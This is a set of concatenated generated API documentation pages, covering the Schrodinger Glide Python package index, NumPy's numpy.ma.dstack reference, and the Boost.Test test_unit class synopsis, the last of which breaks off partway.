<!-- Index link -->
<th> <a
href="identifier-index.html">Indices</a> </th>
<!-- Help link -->
<th> <a
href="help.html">Help</a> </th>
<!-- Project homepage -->
<th class="navbar" align="right" width="100%">
<table border="0" cellpadding="0" cellspacing="0">
<tr><th class="navbar" align="center"
>Suite 2012 Schrodinger Python API</th>
</tr></table></th>
</tr>
</table>
<table width="100%" cellpadding="0" cellspacing="0">
<tr valign="top">
<td width="100%">
<span class="breadcrumbs">
<a href="schrodinger-module.html">Package schrodinger</a> ::
<a href="schrodinger.application-module.html">Package application</a> ::
Package glide
</span>
</td>
<td>
<table cellpadding="0" cellspacing="0">
<!-- hide/show private -->
<tr><td align="right"><span class="options">[<a href="javascript:void(0);" class="privatelink"
onclick="toggle_private();">hide private</a>]</span></td></tr>
<tr><td align="right"><span class="options"
>[<a href="frames.html" target="_top">frames</a
>] | <a href="schrodinger.application.glide-module.html"
target="_top">no frames</a>]</span></td></tr>
</table>
</td>
</tr>
</table>
<!-- ==================== PACKAGE DESCRIPTION ==================== -->
<h1 class="epydoc">Package glide</h1><p class="nomargin-top"></p>
<p>Glide-related modules.</p>
<p>Copyright Schrodinger, LLC. All rights reserved.</p>
<!-- ==================== SUBMODULES ==================== -->
<a name="section-Submodules"></a>
<table class="summary" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr bgcolor="#70b0f0" class="table-header">
<td colspan="2" class="table-header">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td align="left"><span class="table-header">Submodules</span></td>
<td align="right" valign="top"
><span class="options">[<a href="#section-Submodules"
class="privatelink" onclick="toggle_private();"
>hide private</a>]</span></td>
</tr>
</table>
</td>
</tr>
<tr><td class="summary">
<ul class="nomargin">
<li> <strong class="uidlink"><a href="schrodinger.application.glide.ensemble_selection-module.html">schrodinger.application.glide.ensemble_selection</a></strong>: <em class="summary">This module selects the best ensembles of a specified size from a
cross-docking experiment.</em> </li>
<li> <strong class="uidlink"><a href="schrodinger.application.glide.glide-module.html">schrodinger.application.glide.glide</a></strong>: <em class="summary">Classes for creating Grid Generation and Ligand Docking DICE
(Impact) input files from user-friendly keyword/value pairs.</em> </li>
<li> <strong class="uidlink"><a href="schrodinger.application.glide.glideanalysis-module.html">schrodinger.application.glide.glideanalysis</a></strong>: <em class="summary">Functions and classes for calculating Glide Docking Enrichment
Factors and creating sorted pose libraries.</em> </li>
<li> <strong class="uidlink"><a href="schrodinger.application.glide.liaison_lsbd-module.html">schrodinger.application.glide.liaison_lsbd</a></strong>: <em class="summary">Liaison class from the lsbd driver.</em> </li>
<li> <strong class="uidlink"><a href="schrodinger.application.glide.newxp_reorg_fit-module.html">schrodinger.application.glide.newxp_reorg_fit</a></strong>: <em class="summary">Functions and classes for fitting the protein reorganization energy
for newXP Glide</em> </li>
<li class="private"> <strong class="uidlink"><a href="schrodinger.application.glide.poseviewconvert-module.html" onclick="show_private();">schrodinger.application.glide.poseviewconvert</a></strong>: <em class="summary">Functions for creating or converting pose viewer files.</em> </li>
<li> <strong class="uidlink"><a href="schrodinger.application.glide.xp6classes-module.html">schrodinger.application.glide.xp6classes</a></strong>: <em class="summary">Classes (and top-level logging function) to generate and store data
for the Glide "New XP" protocol, for a single
protein-ligand complex.</em> </li>
<li> <strong class="uidlink"><a href="schrodinger.application.glide.xpdes-module.html">schrodinger.application.glide.xpdes</a></strong>: <em class="summary">Classes for reading and writing Glide XP Descriptor (.xpdes) files.</em> </li>
</ul></td></tr>
</table>
<br />
<!-- ==================== VARIABLES ==================== -->
<a name="section-Variables"></a>
<table class="summary" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr bgcolor="#70b0f0" class="table-header">
<td colspan="2" class="table-header">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td align="left"><span class="table-header">Variables</span></td>
<td align="right" valign="top"
><span class="options">[<a href="#section-Variables"
class="privatelink" onclick="toggle_private();"
>hide private</a>]</span></td>
</tr>
</table>
</td>
</tr>
<tr class="private">
<td width="15%" align="right" valign="top" class="summary">
<span class="summary-type"> </span>
</td><td class="summary">
<a name="_version"></a><span class="summary-name">_version</span> = <code title="'$Revision: 1.8 $'"><code class="variable-quote">'</code><code class="variable-string">$Revision: 1.8 $</code><code class="variable-quote">'</code></code>
</td>
</tr>
<tr>
<td width="15%" align="right" valign="top" class="summary">
<span class="summary-type"> </span>
</td><td class="summary">
<a name="MAX_LIGAND_ATOMS"></a><span class="summary-name">MAX_LIGAND_ATOMS</span> = <code title="300">300</code>
</td>
</tr>
<tr class="private">
<td width="15%" align="right" valign="top" class="summary">
<span class="summary-type"> </span>
</td><td class="summary">
<a name="__package__"></a><span class="summary-name">__package__</span> = <code title="None">None</code><br />
hash(x)
</td>
</tr>
</table>
<!-- ==================== NAVIGATION BAR ==================== -->
<table class="navbar" border="0" width="100%" cellpadding="0"
bgcolor="#a0c0ff" cellspacing="0">
<tr valign="middle">
<!-- Home link -->
<th> <a
href="schrodinger-module.html">Home</a> </th>
<!-- Tree link -->
<th> <a
href="module-tree.html">Trees</a> </th>
<!-- Index link -->
<th> <a
href="identifier-index.html">Indices</a> </th>
<!-- Help link -->
<th> <a
href="help.html">Help</a> </th>
<!-- Project homepage -->
<th class="navbar" align="right" width="100%">
<table border="0" cellpadding="0" cellspacing="0">
<tr><th class="navbar" align="center"
>Suite 2012 Schrodinger Python API</th>
</tr></table></th>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" width="100%%">
<tr>
<td align="left" class="footer">
Generated by Epydoc 3.0.1 on Tue Sep 25 02:22:41 2012
</td>
<td align="right" class="footer">
<a target="mainFrame" href="http://epydoc.sourceforge.net"
>http://epydoc.sourceforge.net</a>
</td>
</tr>
</table>
<script type="text/javascript">
<!--
// Private objects are initially displayed (because if
// javascript is turned off then we want them to be
// visible); but by default, we want to hide them. So hide
// them unless we have a cookie that says to show them.
checkCookie();
// -->
</script>
</body>
</html>
|
Coding/Python/numpy-html-1.10.1/reference/generated/numpy.ma.dstack.html | platinhom/ManualHom | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>numpy.ma.dstack — NumPy v1.10 Manual</title>
<link rel="stylesheet" type="text/css" href="../../static_/css/spc-bootstrap.css">
<link rel="stylesheet" type="text/css" href="../../static_/css/spc-extend.css">
<link rel="stylesheet" href="../../static_/scipy.css" type="text/css" >
<link rel="stylesheet" href="../../static_/pygments.css" type="text/css" >
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: '../../',
VERSION: '1.10.1',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: false
};
</script>
<script type="text/javascript" src="../../static_/jquery.js"></script>
<script type="text/javascript" src="../../static_/underscore.js"></script>
<script type="text/javascript" src="../../static_/doctools.js"></script>
<script type="text/javascript" src="../../static_/js/copybutton.js"></script>
<link rel="author" title="About these documents" href="../../about.html" >
<link rel="top" title="NumPy v1.10 Manual" href="../../index.html" >
<link rel="up" title="Masked array operations" href="../routines.ma.html" >
<link rel="next" title="numpy.ma.hstack" href="numpy.ma.hstack.html" >
<link rel="prev" title="numpy.ma.append" href="numpy.ma.append.html" >
</head>
<body>
<div class="container">
<div class="header">
</div>
</div>
<div class="container">
<div class="main">
<div class="row-fluid">
<div class="span12">
<div class="spc-navbar">
<ul class="nav nav-pills pull-left">
<li class="active"><a href="../../index.html">NumPy v1.10 Manual</a></li>
<li class="active"><a href="../index.html" >NumPy Reference</a></li>
<li class="active"><a href="../routines.html" >Routines</a></li>
<li class="active"><a href="../routines.ma.html" accesskey="U">Masked array operations</a></li>
</ul>
<ul class="nav nav-pills pull-right">
<li class="active">
<a href="../../genindex.html" title="General Index"
accesskey="I">index</a>
</li>
<li class="active">
<a href="numpy.ma.hstack.html" title="numpy.ma.hstack"
accesskey="N">next</a>
</li>
<li class="active">
<a href="numpy.ma.append.html" title="numpy.ma.append"
accesskey="P">previous</a>
</li>
</ul>
</div>
</div>
</div>
<div class="row-fluid">
<div class="spc-rightsidebar span3">
<div class="sphinxsidebarwrapper">
<h4>Previous topic</h4>
<p class="topless"><a href="numpy.ma.append.html"
title="previous chapter">numpy.ma.append</a></p>
<h4>Next topic</h4>
<p class="topless"><a href="numpy.ma.hstack.html"
title="next chapter">numpy.ma.hstack</a></p>
</div>
</div>
<div class="span9">
<div class="bodywrapper">
<div class="body" id="spc-section-body">
<div class="section" id="numpy-ma-dstack">
<h1>numpy.ma.dstack<a class="headerlink" href="#numpy-ma-dstack" title="Permalink to this headline">¶</a></h1>
<dl class="data">
<dt id="numpy.ma.dstack">
<tt class="descclassname">numpy.ma.</tt><tt class="descname">dstack</tt><big>(</big><em>tup</em><big>)</big><em class="property"> = <numpy.ma.extras._fromnxfunction instance at 0x423ae6cc></em><a class="headerlink" href="#numpy.ma.dstack" title="Permalink to this definition">¶</a></dt>
<dd><blockquote>
<div><p>Stack arrays in sequence depth wise (along third axis).</p>
<p>Takes a sequence of arrays and stack them along the third axis
to make a single array. Rebuilds arrays divided by <em class="xref py py-obj">dsplit</em>.
This is a simple way to stack 2D arrays (images) into a single
3D array for processing.</p>
</div></blockquote>
<table class="docutils field-list" frame="void" rules="none">
<col class="field-name" />
<col class="field-body" />
<tbody valign="top">
<tr class="field-odd field"><th class="field-name">Parameters:</th><td class="field-body"><p class="first"><strong>tup</strong> : sequence of arrays</p>
<blockquote>
<div><p>Arrays to stack. All of them must have the same shape along all
but the third axis.</p>
</div></blockquote>
</td>
</tr>
<tr class="field-even field"><th class="field-name">Returns:</th><td class="field-body"><p class="first"><strong>stacked</strong> : ndarray</p>
<blockquote class="last">
<div><p>The array formed by stacking the given arrays.</p>
</div></blockquote>
</td>
</tr>
</tbody>
</table>
<div class="admonition seealso">
<p class="first admonition-title">See also</p>
<dl class="last docutils">
<dt><tt class="xref py py-obj docutils literal"><span class="pre">stack</span></tt></dt>
<dd>Join a sequence of arrays along a new axis.</dd>
<dt><a class="reference internal" href="numpy.ma.vstack.html#numpy.ma.vstack" title="numpy.ma.vstack"><tt class="xref py py-obj docutils literal"><span class="pre">vstack</span></tt></a></dt>
<dd>Stack along first axis.</dd>
<dt><a class="reference internal" href="numpy.ma.hstack.html#numpy.ma.hstack" title="numpy.ma.hstack"><tt class="xref py py-obj docutils literal"><span class="pre">hstack</span></tt></a></dt>
<dd>Stack along second axis.</dd>
<dt><a class="reference internal" href="numpy.ma.concatenate.html#numpy.ma.concatenate" title="numpy.ma.concatenate"><tt class="xref py py-obj docutils literal"><span class="pre">concatenate</span></tt></a></dt>
<dd>Join a sequence of arrays along an existing axis.</dd>
<dt><tt class="xref py py-obj docutils literal"><span class="pre">dsplit</span></tt></dt>
<dd>Split array along third axis.</dd>
</dl>
</div>
<p class="rubric">Notes</p>
<p>The function is applied to both the _data and the _mask, if any.</p>
<p class="rubric">Examples</p>
<div class="highlight-python"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">a</span> <span class="o">=</span> <span class="n">np</span><span class="o">.</span><span class="n">array</span><span class="p">((</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">))</span>
<span class="gp">>>> </span><span class="n">b</span> <span class="o">=</span> <span class="n">np</span><span class="o">.</span><span class="n">array</span><span class="p">((</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">))</span>
<span class="gp">>>> </span><span class="n">np</span><span class="o">.</span><span class="n">dstack</span><span class="p">((</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">))</span>
<span class="go">array([[[1, 2],</span>
<span class="go"> [2, 3],</span>
<span class="go"> [3, 4]]])</span>
</pre></div>
</div>
<div class="highlight-python"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">a</span> <span class="o">=</span> <span class="n">np</span><span class="o">.</span><span class="n">array</span><span class="p">([[</span><span class="mi">1</span><span class="p">],[</span><span class="mi">2</span><span class="p">],[</span><span class="mi">3</span><span class="p">]])</span>
<span class="gp">>>> </span><span class="n">b</span> <span class="o">=</span> <span class="n">np</span><span class="o">.</span><span class="n">array</span><span class="p">([[</span><span class="mi">2</span><span class="p">],[</span><span class="mi">3</span><span class="p">],[</span><span class="mi">4</span><span class="p">]])</span>
<span class="gp">>>> </span><span class="n">np</span><span class="o">.</span><span class="n">dstack</span><span class="p">((</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">))</span>
<span class="go">array([[[1, 2]],</span>
<span class="go"> [[2, 3]],</span>
<span class="go"> [[3, 4]]])</span>
</pre></div>
</div>
</dd></dl>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="container container-navbar-bottom">
<div class="spc-navbar">
</div>
</div>
<div class="container">
<div class="footer">
<div class="row-fluid">
<ul class="inline pull-left">
<li>
© Copyright 2008-2009, The Scipy community.
</li>
<li>
Last updated on Oct 18, 2015.
</li>
<li>
Created using <a href="http://sphinx.pocoo.org/">Sphinx</a> 1.2.1.
</li>
</ul>
</div>
</div>
</div>
</body>
</html> |
myodd/boost/libs/test/doc/html/boost/unit_test/test_unit.html | FFMG/myoddweb.piger | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>Class test_unit</title>
<link rel="stylesheet" href="../../boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.79.1">
<link rel="home" href="../../index.html" title="Boost.Test">
<link rel="up" href="../../header/boost/test/tree/test_unit_hpp.html" title="Header <boost/test/tree/test_unit.hpp>">
<link rel="prev" href="../../header/boost/test/tree/test_unit_hpp.html" title="Header <boost/test/tree/test_unit.hpp>">
<link rel="next" href="test_unit_generator.html" title="Class test_unit_generator">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table cellpadding="2" width="100%"><tr>
<td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../../boost.png"></td>
<td align="center"><a href="../../../../../../index.html">Home</a></td>
<td align="center"><a href="../../../../../../libs/libraries.htm">Libraries</a></td>
<td align="center"><a href="http://www.boost.org/users/people.html">People</a></td>
<td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td>
<td align="center"><a href="../../../../../../more/index.htm">More</a></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="../../header/boost/test/tree/test_unit_hpp.html"><img src="../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../../header/boost/test/tree/test_unit_hpp.html"><img src="../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../index.html"><img src="../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="test_unit_generator.html"><img src="../../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
<div class="refentry">
<a name="boost.unit_test.test_unit"></a><div class="titlepage"></div>
<div class="refnamediv">
<h2><span class="refentrytitle">Class test_unit</span></h2>
<p>boost::unit_test::test_unit</p>
</div>
<h2 xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv-title">Synopsis</h2>
<div xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv"><pre class="synopsis"><span class="comment">// In header: <<a class="link" href="../../header/boost/test/tree/test_unit_hpp.html" title="Header <boost/test/tree/test_unit.hpp>">boost/test/tree/test_unit.hpp</a>>
</span>
<span class="keyword">class</span> <a class="link" href="test_unit.html" title="Class test_unit">test_unit</a> <span class="special">{</span>
<span class="keyword">public</span><span class="special">:</span>
<span class="comment">// types</span>
<span class="keyword">typedef</span> <span class="identifier">std</span><span class="special">::</span><span class="identifier">vector</span><span class="special"><</span> <span class="identifier">test_unit_id</span> <span class="special">></span> <a name="boost.unit_test.test_unit.id_list"></a><span class="identifier">id_list</span><span class="special">;</span>
<span class="keyword">typedef</span> <span class="identifier">std</span><span class="special">::</span><span class="identifier">vector</span><span class="special"><</span> <span class="identifier">test_unit_fixture_ptr</span> <span class="special">></span> <a name="boost.unit_test.test_unit.fixture_list_t"></a><span class="identifier">fixture_list_t</span><span class="special">;</span>
<span class="keyword">typedef</span> <span class="identifier">std</span><span class="special">::</span><span class="identifier">vector</span><span class="special"><</span> <span class="identifier">decorator</span><span class="special">::</span><span class="identifier">base_ptr</span> <span class="special">></span> <a name="boost.unit_test.test_unit.decor_list_t"></a><span class="identifier">decor_list_t</span><span class="special">;</span>
<span class="keyword">typedef</span> <span class="identifier">boost</span><span class="special">::</span><span class="identifier">function</span><span class="special"><</span> <a class="link" href="../test_tools/assertion_result.html" title="Class assertion_result">test_tools::assertion_result</a><span class="special">(</span><span class="identifier">test_unit_id</span><span class="special">)</span><span class="special">></span> <a name="boost.unit_test.test_unit.precondition_t"></a><span class="identifier">precondition_t</span><span class="special">;</span>
<span class="keyword">enum</span> <a name="boost.unit_test.test_unit.@0"></a>@0 <span class="special">{</span> type = = TUT_ANY <span class="special">}</span><span class="special">;</span>
<span class="keyword">enum</span> <a name="boost.unit_test.test_unit.run_status"></a>run_status <span class="special">{</span> RS_DISABLED, RS_ENABLED, RS_INHERIT, RS_INVALID <span class="special">}</span><span class="special">;</span>
<span class="comment">// <a class="link" href="test_unit.html#boost.unit_test.test_unitconstruct-copy-destruct">construct/copy/destruct</a></span>
<a class="link" href="test_unit.html#idm45194480897968-bb"><span class="identifier">test_unit</span></a><span class="special">(</span><span class="identifier">const_string</span><span class="special">,</span> <span class="identifier">const_string</span><span class="special">,</span> <span class="identifier">std</span><span class="special">::</span><span class="identifier">size_t</span><span class="special">,</span> <span class="identifier">test_unit_type</span><span class="special">)</span><span class="special">;</span>
<span class="keyword">explicit</span> <a class="link" href="test_unit.html#idm45194480894928-bb"><span class="identifier">test_unit</span></a><span class="special">(</span><span class="identifier">const_string</span><span class="special">)</span><span class="special">;</span>
<a class="link" href="test_unit.html#idm45194480898256-bb"><span class="special">~</span><span class="identifier">test_unit</span></a><span class="special">(</span><span class="special">)</span><span class="special">;</span>
<span class="comment">// <a class="link" href="test_unit.html#idm45194480924400-bb">public member functions</a></span>
<span class="keyword">typedef</span> <a class="link" href="test_unit.html#idm45194480923840-bb"><span class="identifier">BOOST_READONLY_PROPERTY</span></a><span class="special">(</span><span class="identifier">test_unit_id</span><span class="special">,</span> <span class="special">(</span><span class="identifier">framework</span><span class="special">::</span><span class="identifier">state</span><span class="special">)</span><span class="special">)</span><span class="special">;</span>
<span class="keyword">typedef</span> <a class="link" href="test_unit.html#idm45194480921616-bb"><span class="identifier">BOOST_READONLY_PROPERTY</span></a><span class="special">(</span><span class="identifier">test_unit_id</span><span class="special">,</span> <span class="special">(</span><a class="link" href="test_suite.html" title="Class test_suite">test_suite</a><span class="special">)</span><span class="special">)</span><span class="special">;</span>
<span class="keyword">typedef</span> <a class="link" href="test_unit.html#idm45194480918944-bb"><span class="identifier">BOOST_READONLY_PROPERTY</span></a><span class="special">(</span><span class="identifier">id_list</span><span class="special">,</span> <span class="special">(</span><a class="link" href="test_unit.html" title="Class test_unit">test_unit</a><span class="special">)</span><span class="special">)</span><span class="special">;</span>
<span class="keyword">typedef</span> <a class="link" href="test_unit.html#idm45194480916272-bb"><span class="identifier">BOOST_READONLY_PROPERTY</span></a><span class="special">(</span><span class="identifier">std</span><span class="special">::</span><span class="identifier">vector</span><span class="special"><</span> <span class="identifier">std</span><span class="special">::</span><span class="identifier">string</span> <span class="special">></span><span class="special">,</span> <span class="special">(</span><a class="link" href="test_unit.html" title="Class test_unit">test_unit</a><span class="special">)</span><span class="special">)</span><span class="special">;</span>
<span class="keyword">typedef</span> <a class="link" href="test_unit.html#idm45194480913584-bb"><span class="identifier">BOOST_READONLY_PROPERTY</span></a><span class="special">(</span><span class="identifier">std</span><span class="special">::</span><span class="identifier">vector</span><span class="special"><</span> <span class="identifier">precondition_t</span> <span class="special">></span><span class="special">,</span> <span class="special">(</span><a class="link" href="test_unit.html" title="Class test_unit">test_unit</a><span class="special">)</span><span class="special">)</span><span class="special">;</span>
<span class="keyword">void</span> <a class="link" href="test_unit.html#idm45194480910896-bb"><span class="identifier">depends_on</span></a><span class="special">(</span><a class="link" href="test_unit.html" title="Class test_unit">test_unit</a> <span class="special">*</span><span class="special">)</span><span class="special">;</span>
<span class="keyword">void</span> <a class="link" href="test_unit.html#idm45194480909072-bb"><span class="identifier">add_precondition</span></a><span class="special">(</span><span class="identifier">precondition_t</span> <span class="keyword">const</span> <span class="special">&</span><span class="special">)</span><span class="special">;</span>
<a class="link" href="../test_tools/assertion_result.html" title="Class assertion_result">test_tools::assertion_result</a> <a class="link" href="test_unit.html#idm45194480907536-bb"><span class="identifier">check_preconditions</span></a><span class="special">(</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span>
<span class="keyword">void</span> <a class="link" href="test_unit.html#idm45194480906272-bb"><span class="identifier">add_label</span></a><span class="special">(</span><span class="identifier">const_string</span><span class="special">)</span><span class="special">;</span>
<span class="keyword">bool</span> <a class="link" href="test_unit.html#idm45194480904736-bb"><span class="identifier">has_label</span></a><span class="special">(</span><span class="identifier">const_string</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span>
<span class="keyword">void</span> <a class="link" href="test_unit.html#idm45194480902928-bb"><span class="identifier">increase_exp_fail</span></a><span class="special">(</span><span class="identifier">counter_t</span><span class="special">)</span><span class="special">;</span>
<span class="keyword">bool</span> <a class="link" href="test_unit.html#idm45194480901392-bb"><span class="identifier">is_enabled</span></a><span class="special">(</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span>
<span class="identifier">std</span><span class="special">::</span><span class="identifier">string</span> <a class="link" href="test_unit.html#idm45194480900272-bb"><span class="identifier">full_name</span></a><span class="special">(</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span>
<span class="comment">// public data members</span>
<span class="identifier">test_unit_type</span> <span class="keyword">const</span> <span class="identifier">p_type</span><span class="special">;</span> <span class="comment">// type for this test unit </span>
<span class="identifier">const_string</span> <span class="keyword">const</span> <span class="identifier">p_type_name</span><span class="special">;</span> <span class="comment">// "case"/"suite"/"module" </span>
<span class="identifier">const_string</span> <span class="keyword">const</span> <span class="identifier">p_file_name</span><span class="special">;</span>
<span class="identifier">std</span><span class="special">::</span><span class="identifier">size_t</span> <span class="keyword">const</span> <span class="identifier">p_line_num</span><span class="special">;</span>
<span class="identifier">id_t</span> <span class="identifier">p_id</span><span class="special">;</span> <span class="comment">// unique id for this test unit </span>
<span class="identifier">parent_id_t</span> <span class="identifier">p_parent_id</span><span class="special">;</span> <span class="comment">// parent test suite id </span>
<span class="identifier">label_list_t</span> <span class="identifier">p_labels</span><span class="special">;</span> <span class="comment">// list of labels associated with this test unit </span>
<span class="identifier">id_list_t</span> <span class="identifier">p_dependencies</span><span class="special">;</span> <span class="comment">// list of test units this one depends on </span>
<span class="identifier">precond_list_t</span> <span class="identifier">p_preconditions</span><span class="special">;</span> <span class="comment">// user supplied preconditions for this test unit; </span>
<span class="identifier">readwrite_property</span><span class="special"><</span> <span class="identifier">std</span><span class="special">::</span><span class="identifier">string</span> <span class="special">></span> <span class="identifier">p_name</span><span class="special">;</span> <span class="comment">// name for this test unit </span>
<span class="identifier">readwrite_property</span><span class="special"><</span> <span class="identifier">std</span><span class="special">::</span><span class="identifier">string</span> <span class="special">></span> <span class="identifier">p_description</span><span class="special">;</span> <span class="comment">// description for this test unit </span>
<span class="identifier">readwrite_property</span><span class="special"><</span> <span class="keyword">unsigned</span> <span class="special">></span> <span class="identifier">p_timeout</span><span class="special">;</span> <span class="comment">// timeout for the test unit execution in seconds </span>
<span class="identifier">readwrite_property</span><span class="special"><</span> <span class="identifier">counter_t</span> <span class="special">></span> <span class="identifier">p_expected_failures</span><span class="special">;</span> <span class="comment">// number of expected failures in this test unit </span>
<span class="identifier">readwrite_property</span><span class="special"><</span> <span class="identifier">run_status</span> <span class="special">></span> <span class="identifier">p_default_status</span><span class="special">;</span> <span class="comment">// run status obtained by this unit during setup phase </span>
<span class="identifier">readwrite_property</span><span class="special"><</span> <span class="identifier">run_status</span> <span class="special">></span> <span class="identifier">p_run_status</span><span class="special">;</span> <span class="comment">// run status assigned to this unit before execution phase after applying all filters </span>
<span class="identifier">readwrite_property</span><span class="special"><</span> <span class="identifier">counter_t</span> <span class="special">></span> <span class="identifier">p_sibling_rank</span><span class="special">;</span> <span class="comment">// rank of this test unit amoung siblings of the same parent </span>
<span class="identifier">readwrite_property</span><span class="special"><</span> <span class="identifier">decor_list_t</span> <span class="special">></span> <span class="identifier">p_decorators</span><span class="special">;</span> <span class="comment">// automatically assigned decorators; execution is delayed till framework::finalize_setup_phase function </span>
<span class="identifier">readwrite_property</span><span class="special"><</span> <span class="identifier">fixture_list_t</span> <span class="special">></span> <span class="identifier">p_fixtures</span><span class="special">;</span> <span class="comment">// fixtures associated with this test unit </span>
<span class="special">}</span><span class="special">;</span></pre></div>
<div class="refsect1">
<a name="idm46115246135248"></a><h2>Description</h2>
<div class="refsect2">
<a name="idm46115246134832"></a><h3>
<a name="boost.unit_test.test_unitconstruct-copy-destruct"></a><code class="computeroutput">test_unit</code>
public
construct/copy/destruct</h3>
<div class="orderedlist"><ol class="orderedlist" type="1">
<li class="listitem"><pre class="literallayout"><a name="idm45194480897968-bb"></a><span class="identifier">test_unit</span><span class="special">(</span><span class="identifier">const_string</span> tu_name<span class="special">,</span> <span class="identifier">const_string</span> tc_file<span class="special">,</span> <span class="identifier">std</span><span class="special">::</span><span class="identifier">size_t</span> tc_line<span class="special">,</span>
<span class="identifier">test_unit_type</span> t<span class="special">)</span><span class="special">;</span></pre></li>
<li class="listitem"><pre class="literallayout"><span class="keyword">explicit</span> <a name="idm45194480894928-bb"></a><span class="identifier">test_unit</span><span class="special">(</span><span class="identifier">const_string</span> module_name<span class="special">)</span><span class="special">;</span></pre></li>
<li class="listitem"><pre class="literallayout"><a name="idm45194480898256-bb"></a><span class="special">~</span><span class="identifier">test_unit</span><span class="special">(</span><span class="special">)</span><span class="special">;</span></pre></li>
</ol></div>
</div>
<div class="refsect2">
<a name="idm46115246114080"></a><h3>
<a name="idm45194480924400-bb"></a><code class="computeroutput">test_unit</code> public member functions</h3>
<div class="orderedlist"><ol class="orderedlist" type="1">
<li class="listitem"><pre class="literallayout"><span class="keyword">typedef</span> <a name="idm45194480923840-bb"></a><span class="identifier">BOOST_READONLY_PROPERTY</span><span class="special">(</span><span class="identifier">test_unit_id</span><span class="special">,</span> <span class="special">(</span><span class="identifier">framework</span><span class="special">::</span><span class="identifier">state</span><span class="special">)</span><span class="special">)</span><span class="special">;</span></pre></li>
<li class="listitem"><pre class="literallayout"><span class="keyword">typedef</span> <a name="idm45194480921616-bb"></a><span class="identifier">BOOST_READONLY_PROPERTY</span><span class="special">(</span><span class="identifier">test_unit_id</span><span class="special">,</span> <span class="special">(</span><a class="link" href="test_suite.html" title="Class test_suite">test_suite</a><span class="special">)</span><span class="special">)</span><span class="special">;</span></pre></li>
<li class="listitem"><pre class="literallayout"><span class="keyword">typedef</span> <a name="idm45194480918944-bb"></a><span class="identifier">BOOST_READONLY_PROPERTY</span><span class="special">(</span><span class="identifier">id_list</span><span class="special">,</span> <span class="special">(</span><a class="link" href="test_unit.html" title="Class test_unit">test_unit</a><span class="special">)</span><span class="special">)</span><span class="special">;</span></pre></li>
<li class="listitem"><pre class="literallayout"><span class="keyword">typedef</span> <a name="idm45194480916272-bb"></a><span class="identifier">BOOST_READONLY_PROPERTY</span><span class="special">(</span><span class="identifier">std</span><span class="special">::</span><span class="identifier">vector</span><span class="special"><</span> <span class="identifier">std</span><span class="special">::</span><span class="identifier">string</span> <span class="special">></span><span class="special">,</span> <span class="special">(</span><a class="link" href="test_unit.html" title="Class test_unit">test_unit</a><span class="special">)</span><span class="special">)</span><span class="special">;</span></pre></li>
<li class="listitem"><pre class="literallayout"><span class="keyword">typedef</span> <a name="idm45194480913584-bb"></a><span class="identifier">BOOST_READONLY_PROPERTY</span><span class="special">(</span><span class="identifier">std</span><span class="special">::</span><span class="identifier">vector</span><span class="special"><</span> <span class="identifier">precondition_t</span> <span class="special">></span><span class="special">,</span> <span class="special">(</span><a class="link" href="test_unit.html" title="Class test_unit">test_unit</a><span class="special">)</span><span class="special">)</span><span class="special">;</span></pre></li>
<li class="listitem"><pre class="literallayout"><span class="keyword">void</span> <a name="idm45194480910896-bb"></a><span class="identifier">depends_on</span><span class="special">(</span><a class="link" href="test_unit.html" title="Class test_unit">test_unit</a> <span class="special">*</span> tu<span class="special">)</span><span class="special">;</span></pre></li>
<li class="listitem"><pre class="literallayout"><span class="keyword">void</span> <a name="idm45194480909072-bb"></a><span class="identifier">add_precondition</span><span class="special">(</span><span class="identifier">precondition_t</span> <span class="keyword">const</span> <span class="special">&</span><span class="special">)</span><span class="special">;</span></pre></li>
<li class="listitem"><pre class="literallayout"><a class="link" href="../test_tools/assertion_result.html" title="Class assertion_result">test_tools::assertion_result</a> <a name="idm45194480907536-bb"></a><span class="identifier">check_preconditions</span><span class="special">(</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span></pre></li>
<li class="listitem"><pre class="literallayout"><span class="keyword">void</span> <a name="idm45194480906272-bb"></a><span class="identifier">add_label</span><span class="special">(</span><span class="identifier">const_string</span> l<span class="special">)</span><span class="special">;</span></pre></li>
<li class="listitem"><pre class="literallayout"><span class="keyword">bool</span> <a name="idm45194480904736-bb"></a><span class="identifier">has_label</span><span class="special">(</span><span class="identifier">const_string</span> l<span class="special">)</span> <span class="keyword">const</span><span class="special">;</span></pre></li>
